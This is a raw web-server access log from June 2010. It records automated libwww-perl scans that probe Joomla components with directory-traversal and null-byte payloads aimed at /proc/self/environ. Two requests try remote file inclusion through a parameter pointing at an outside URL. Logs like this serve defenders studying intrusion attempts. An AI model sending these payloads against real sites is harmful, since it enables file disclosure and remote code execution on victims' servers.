216.97.239.115 - - [13/Jun/2010:05:56:00 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.819"
189.11.126.17 - - [13/Jun/2010:05:56:32 -0500] "GET /logs//uigaproxy/include/template.php?content=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
189.11.126.17 - - [13/Jun/2010:05:56:33 -0500] "GET //uigaproxy/include/template.php?content=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
216.97.239.115 - - [13/Jun/2010:05:57:30 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.819"
74.204.169.23 - - [13/Jun/2010:05:57:43 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.204.169.23 - - [13/Jun/2010:05:57:43 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
173.160.141.237 - - [13/Jun/2010:05:58:15 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
173.160.141.237 - - [13/Jun/2010:05:58:15 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.204.169.23 - - [13/Jun/2010:06:01:15 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.204.169.23 - - [13/Jun/2010:06:01:15 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.204.169.23 - - [13/Jun/2010:06:01:15 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
87.106.183.116 - - [13/Jun/2010:06:01:31 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:01:32 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.210.190.230 - - [13/Jun/2010:06:02:37 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
62.210.190.230 - - [13/Jun/2010:06:02:37 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
173.160.141.237 - - [13/Jun/2010:06:02:38 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
173.160.141.237 - - [13/Jun/2010:06:02:38 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
173.160.141.237 - - [13/Jun/2010:06:02:39 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
178.63.27.83 - - [13/Jun/2010:06:03:44 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:03:45 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:04:09 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:04:10 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:04:22 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:04:23 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:04:28 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:04:32 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:04:32 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:04:42 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:04:42 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:05:14 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:05:14 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:05:15 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:05:17 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:05:17 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:05:27 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:05:27 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
87.106.183.116 - - [13/Jun/2010:06:05:37 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:05:37 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.205.85.5 - - [13/Jun/2010:06:05:58 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.121.188.69 - - [13/Jun/2010:06:06:00 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
178.63.27.83 - - [13/Jun/2010:06:06:04 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
174.121.188.69 - - [13/Jun/2010:06:06:05 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.810"
174.121.188.69 - - [13/Jun/2010:06:06:05 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.188.69 - - [13/Jun/2010:06:06:06 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.205.85.5 - - [13/Jun/2010:06:06:08 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
178.63.27.83 - - [13/Jun/2010:06:06:10 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
69.64.91.113 - - [13/Jun/2010:06:06:11 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.828"
178.63.27.83 - - [13/Jun/2010:06:06:12 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:06:18 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:06:18 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:06:18 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.813"
69.64.91.113 - - [13/Jun/2010:06:06:33 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.828"
178.63.27.83 - - [13/Jun/2010:06:06:41 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:06:48 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:06:48 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:06:48 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.813"
174.121.188.69 - - [13/Jun/2010:06:06:58 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
178.63.27.83 - - [13/Jun/2010:06:07:15 -0500] "GET /logs/access_log.1274832000//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:07:15 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:07:15 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:07:28 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
62.44.82.118 - - [13/Jun/2010:06:07:31 -0500] "GET /logs/access_log.1274832000//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:07:31 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:07:32 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
178.63.27.83 - - [13/Jun/2010:06:07:34 -0500] "GET /logs/access_log.1274832000//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:07:57 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:07:57 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:07:58 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.813"
207.46.199.183 - - [13/Jun/2010:06:08:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.188.69 - - [13/Jun/2010:06:08:01 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
87.106.183.116 - - [13/Jun/2010:06:08:04 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:08:04 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.82.118 - - [13/Jun/2010:06:08:27 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:08:27 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:08:28 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
178.63.27.83 - - [13/Jun/2010:06:08:47 -0500] "GET /logs/access_log.1274832000//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:08:47 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:08:47 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:08:57 -0500] "GET /logs/access_log.1274832000//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
67.205.85.5 - - [13/Jun/2010:06:09:08 -0500] "GET /logs/access_log.1274572800//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:09:08 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:09:08 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
62.44.82.118 - - [13/Jun/2010:06:09:11 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:09:13 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.205.85.5 - - [13/Jun/2010:06:09:14 -0500] "GET /logs/access_log.1274572800//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:09:14 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:09:14 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
69.64.91.113 - - [13/Jun/2010:06:09:21 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:06:09:21 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:06:09:21 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.828"
62.210.190.230 - - [13/Jun/2010:06:09:32 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
62.210.190.230 - - [13/Jun/2010:06:09:32 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
69.64.91.113 - - [13/Jun/2010:06:10:03 -0500] "GET /logs/access_log.1274832000//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:06:10:04 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:06:10:04 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:06:10:43 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.828"
62.44.82.118 - - [13/Jun/2010:06:11:08 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:11:09 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.246.62.189 - - [13/Jun/2010:06:11:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)"
62.44.82.118 - - [13/Jun/2010:06:11:43 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:11:56 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:12:09 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:12:12 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:12:12 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:12:15 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:12:16 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
87.106.183.116 - - [13/Jun/2010:06:12:31 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:12:31 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.64.91.113 - - [13/Jun/2010:06:12:40 -0500] "GET /logs/access_log.1274832000//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.828"
174.121.188.69 - - [13/Jun/2010:06:12:44 -0500] "GET /logs/access_log.1274832000//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
174.121.188.69 - - [13/Jun/2010:06:12:45 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.188.69 - - [13/Jun/2010:06:12:45 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.810"
62.210.190.230 - - [13/Jun/2010:06:12:46 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
62.210.190.230 - - [13/Jun/2010:06:12:46 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
